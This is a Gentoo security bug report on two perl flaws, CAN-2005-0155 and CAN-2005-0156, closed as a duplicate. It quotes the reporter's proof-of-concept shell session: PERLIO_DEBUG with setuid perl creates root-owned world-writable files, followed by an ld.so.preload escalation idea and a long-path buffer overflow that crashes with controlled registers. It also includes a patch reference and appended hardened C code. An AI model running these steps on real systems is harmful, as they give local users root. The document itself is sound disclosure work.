Bug 80235 - dev-lang/perl CAN-2005-015{5,6}
Summary: dev-lang/perl CAN-2005-015{5,6}
Status: RESOLVED DUPLICATE of bug 80460
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All All
Importance: High normal
Assignee: Gentoo Security
URL:
Whiteboard: /CLASSIFIED date?
Keywords:
Depends on:
Blocks:
 
Reported: 2005-01-31 10:52 UTC by Sune Kloppenborg Jeppesen (RETIRED)
Modified: 2008-04-23 08:12 UTC (History)

See Also:
Package list:
Runtime testing required: ---


Attachments
perl-5.8.6-bug33990.patch (perl-5.8.6-bug33990.patch,742 bytes, patch)
2005-01-31 10:53 UTC, Sune Kloppenborg Jeppesen (RETIRED)

Description Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-01-31 10:52:31 UTC
Two perl issues:

PERLIO_DEBUG
If set to the name of a file or device then certain operations of PerlIO
sub-system will be logged to that file (opened as append). Typical uses
are UNIX:

./perlio.c:
void
PerlIO_debug(const char *fmt, ...)
{
...
    if (!dbg) {
        char *s = PerlEnv_getenv("PERLIO_DEBUG");
        if (s && *s)
            dbg = PerlLIO_open3(s, O_WRONLY | O_CREAT | O_APPEND, 0666);
        else
            dbg = -1;
    }


If $ENV{'PERLIO_DEBUG'} is not set, PerlIO_debug() is a no-op.

else you can do the following either via sperl or via sperl:

sperl:
kfinisterre@jdam:~$ ls -al /usr/bin/sperl5.8.4
-rwsr-xr-x  1 root root 63808 2004-12-11 18:32 /usr/bin/sperl5.8.4
kfinisterre@jdam:~$ export PERLIO_DEBUG=/tmp/aaa
kfinisterre@jdam:~$ umask 001
kfinisterre@jdam:~$ /usr/bin/sperl5.8.4
sperl needs fd script
You should not call sperl directly; do you need to change a #! line
from sperl to perl?
kfinisterre@jdam:~$ ls -al /tmp/aaa
-rw-rw-rw-  1 root kfinisterre 1403 2005-01-30 02:34 /tmp/aaa

setuid wrapper:
kfinisterre@jdam:/tmp$ ls -al /usr/sbin/mooix-pty-helper
/usr/sbin/mooregister /usr/sbin/moopasswd
-rwsr-xr-x  1 root root 2872 2003-11-20 15:28/usr/sbin/mooix-pty-helperc
-rwsr-xr-x  1 root root 2832 2003-11-20 15:28 /usr/sbin/moopasswd
-rwsr-xr-x  1 root root 2836 2003-11-20 15:28 /usr/sbin/mooregister

These are all setuid programs that invoke perl scripts.

/usr/share/mooix/mooix-pty-helper.pl
/usr/share/mooix/moopasswd.pl
/usr/share/mooix/mooregister.pl

kfinisterre@jdam:/tmp$ umask 001
kfinisterre@jdam:/tmp$ export PERLIO_DEBUG=/tmp/oops2
kfinisterre@jdam:/tmp$ /usr/sbin/mooix-pty-helper
need a session dir at /usr/share/mooix/mooix-pty-helper.pl line 22,
<CONFIG> line 98.
kfinisterre@jdam:/tmp$ ls -al /tmp/oops2
-rw-rw-rw-  1 root kfinisterre 30285 2005-01-30 02:23 /tmp/oops2

kfinisterre@jdam:/tmp$ tail /tmp/oops2 -n 3
/usr/share/mooix/mooix-pty-helper.pl:0 fd 0 refcnt=0
/usr/share/mooix/mooix-pty-helper.pl:0 fd 1 refcnt=0
/usr/share/mooix/mooix-pty-helper.pl:0 fd 2 refcnt=0

kfinisterre@jdam:/tmp$ echo + + > /tmp/oops2

hrmmm...
kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory

gonna try to write an ld.so.preload exploit without trashing my box. hehe. fun time.

Second issue:

While looking at the source code to figure out the details of my PERLIO_DEBUG file overwrite bug,
I also found a buffer overflow...

in perlio.c:

   if (dbg > 0) {
        dTHX;
#ifdef USE_ITHREADS
        /* Use fixed buffer as sv_catpvf etc. needs SVs */
        char buffer[1024];
        char *s;
        STRLEN len;
        s = CopFILE(PL_curcop);
        if (!s)
            s = "(none)";
        sprintf(buffer, "%s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));

Set PERLIO_DEBUG to anything.

Make a perl script calling sperl and run it with the full path (after placing it in a long ass directory):

#!/usr/bin/sperl5.8.4
print a;


kfinisterre@jdam:/tmp$ /tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.pl
Segmentation fault



 stat64("/usr/local/share/perl/5.8.0", 0xbfffd880) = -1 ENOENT (No such file or directory)
** eip[40175563] eax[ffffffda] ecx[00008441] edx[000001b6] ebx[080677ad] esp[bfffd294] ebp[bfffd2a8] esi[00008441] edi[40177d00]
 open("/tmp/lala", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 3
** eip[4021898a] eax[00000000] ecx[08054e04] edx[bfffcd9c] ebx[402e95e0] esp[bfffcbc8] ebp[bfffcbe0] esi[41414141] edi[bfffcd9c]
 --- SIGSEGV (Segmentation fault) @ 0 (0) ---
upeek: ptrace(PTRACE_PEEKUSER,2970,48,0): No such process
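As an added example (my own constructed model, not perl's perlio.c and not the attached Mandrake patch), the C below places each of the two defects from the report beside a hardened form: PERLIO_DEBUG is ignored when real and effective ids differ, and the location string is written with a bounded snprintf instead of sprintf into the 1024-byte buffer. The 40-character path cap and the helper names are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* Constructed model of the two PerlIO_debug() defects in the report, each beside
 * a hardened counterpart. Not perl's source and not the attached patch. */
#define DEBUG_BUF 1024     /* same fixed size as perlio.c's char buffer[1024] */
#define FILE_MAX_CHARS 40  /* assumed cap on how much of the script path is logged */

/* Issue 1: the original reads PERLIO_DEBUG unconditionally, so the caller of a
 * setuid/setgid binary chooses a path that is then opened O_CREAT as root.
 * Hardened: honour the variable only when real and effective ids match. */
const char *debug_target(const char *env, uid_t uid, uid_t euid,
                         gid_t gid, gid_t egid)
{
    if (uid != euid || gid != egid)
        return NULL;            /* privileged: the environment is untrusted */
    if (env == NULL || *env == '\0')
        return NULL;            /* unset: PerlIO_debug() stays a no-op */
    return env;
}

/* Issue 2: sprintf(buffer, "%s:%ld ", file, line) into the 1024-byte stack
 * buffer overflows once the script path is long enough. Hardened: bound the
 * write and cap the path field. Returns characters stored, excluding the NUL. */
size_t format_location(char *buf, size_t buflen, const char *file, long line)
{
    int n;
    if (file == NULL)
        file = "(none)";
    n = snprintf(buf, buflen, "%.*s:%ld ", FILE_MAX_CHARS, file, line);
    if (n < 0)
        return 0;
    return (size_t)n < buflen ? (size_t)n : buflen - 1;
}

/* Drive the hardened formatter with a constructed path of n 'A's (like the
 * report's /tmp/AAAA.../test.pl). Stores the bounded length and returns 1 if
 * the original unbounded sprintf would have written past DEBUG_BUF. */
int long_path_overflows(size_t n, size_t *bounded_len)
{
    static char path[8192];
    char buf[DEBUG_BUF];
    if (n >= sizeof path) n = sizeof path - 1;
    memset(path, 'A', n);
    path[n] = '\0';
    *bounded_len = format_location(buf, sizeof buf, path, 0);
    /* snprintf(NULL, 0, ...) measures what sprintf would need, plus the NUL */
    return snprintf(NULL, 0, "%s:%ld ", path, 0L) + 1 > DEBUG_BUF;
}
```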
Comment 1 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-01-31 10:53:49 UTC
Created attachment 50060 [details, diff]
perl-5.8.6-bug33990.patch

Mandrake patch
Comment 2 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-02-01 01:37:59 UTC
CAN-2005-0155 for the privilege escalation in debug mode
CAN-2005-0156 for the buffer overflow
Comment 3 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-02-02 07:01:45 UTC
This is public now on #bug 80460.
Comment 4 Thierry Carrez (RETIRED) gentoo-dev 2005-02-02 10:13:25 UTC

*** This bug has been marked as a duplicate of 80460 ***